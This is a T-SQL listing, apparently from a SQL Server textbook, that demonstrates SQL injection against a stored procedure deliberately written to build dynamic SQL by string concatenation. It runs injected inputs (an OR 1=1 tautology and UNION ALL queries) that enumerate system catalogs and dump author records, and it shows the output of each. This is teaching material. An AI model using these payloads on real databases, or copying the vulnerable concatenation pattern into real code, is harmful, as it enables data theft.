--Listing 46.1 - Sample Procedure to Demonstrate SQL Injection
use bigpubs2005
go
create proc dbo.get_titles @type varchar(12) = null,
                      @pubdate varchar(10) = null,
                      @price varchar(6) = null,
                      @title varchar(80) = null
as
declare @where varchar(4000)
set @where = ' WHERE 1 = 1 '
if @type is not null
    set @where = @where + ' AND type = ''' + @type + ''''
if @pubdate is not null
    set @where = @where + ' AND pubdate = ''' + @pubdate + ''''
if @price is not null
    set @where = @where + ' AND price = ' + @price
if @title is not null
    set @where = @where + ' AND title like ''' + @title + ''''

exec ('select left(title, 60) as title,
       convert (char(10), pubdate, 101) as pubdate from dbo.titles ' + @where)

return
go

--example of a typical execution of this procedure if the end user 
-- enters business in the book type search field:
exec dbo.get_titles @type = 'business'
go

/*
title                                                        pubdate
------------------------------------------------------------ ----------
The Busy Executive's Database Guide                          06/12/1991
Cooking with Computers: Surreptitious Balance Sheets         06/09/1991
You Can Combat Computer Stress!                              06/30/1991
Straight Talk About Computers                                06/22/1991
*/

--inserting a single quote into the search field to close out the string and appending a SQL statement after it
exec dbo.get_titles @title = ''' OR 1 = 1 --'
go

/*
title                                                        pubdate
------------------------------------------------------------ ----------
Samuel Johnson                                               09/19/1995
Freud, Dora, and Vienna 1900                                 02/25/1995
Freud: A Life for Our Time                                   06/21/1995
For Love of the World                                        01/06/1993
Freud: A Life for Our Time                                   10/16/1994
The Riddle of Anna Anderson                                  02/21/1994
Final Analysis                                               05/31/1993
...
*/

-- Add a UNION ALL statement to get more information from system catalogs
exec dbo.get_titles @title = ''' UNION ALL select TABLE_NAME, NULL from INFORMATION_SCHEMA.TABLES --'
go

/*
title                            pubdate                
-------------------------------- -----------
sales_big                        NULL
roysched                         NULL
titleauthor                      NULL
PARTS                            NULL
titleview                        NULL
publishers                       NULL
top_sales                        NULL
sales_archive                    NULL
authors                          NULL
jobs                             NULL
pub_info                         NULL
sales                            NULL
sales_qty_rollup                 NULL
stores                           NULL
titles                           NULL
discounts                        NULL
employee                         NULL
sales_noclust                    NULL
*/

--try to query the authors table to see if there is any sensitive data
exec dbo.get_titles @title = ''' UNION ALL select name, str(id) from sysobjects where name = ''authors''--'
go

/*
title                            pubdate
-------------------------------- ----------
authors                          1253579504
*/

exec dbo.get_titles @title = ''' UNION ALL select name, null from syscolumns where id = 1253579504--'
go

/*
title                            pubdate
-------------------------------- ----------
au_id                            NULL
au_lname                         NULL
au_fname                         NULL
phone                            NULL
address                          NULL
city                             NULL
state                            NULL
zip                              NULL
contract                         NULL
*/

--attempt to view data in those columsn 
exec dbo.get_titles @title = ''' UNION ALL select au_id + au_lname, au_fname from authors--'
go

/*
title                                                        pubdate
------------------------------------------------------------ --------------------
681-61-9588Ahlberg                                           Allan
739-35-5165Ahlberg                                           Janet
499-84-5672Alexander                                         Lloyd
969-00-7063Amis                                              Martin
263-46-4600Arendt                                            Hannah
626-03-3836Arnosky                                           Jim
432-31-3829Bate                                              W. Jackson
437-99-3329Bauer                                             Caroline Feller
378-33-9373Benchley                                          Nathaniel
409-56-7008Bennet                                            Abraham
648-92-1872Blotchet-Halls                                    Reginald
...
*/
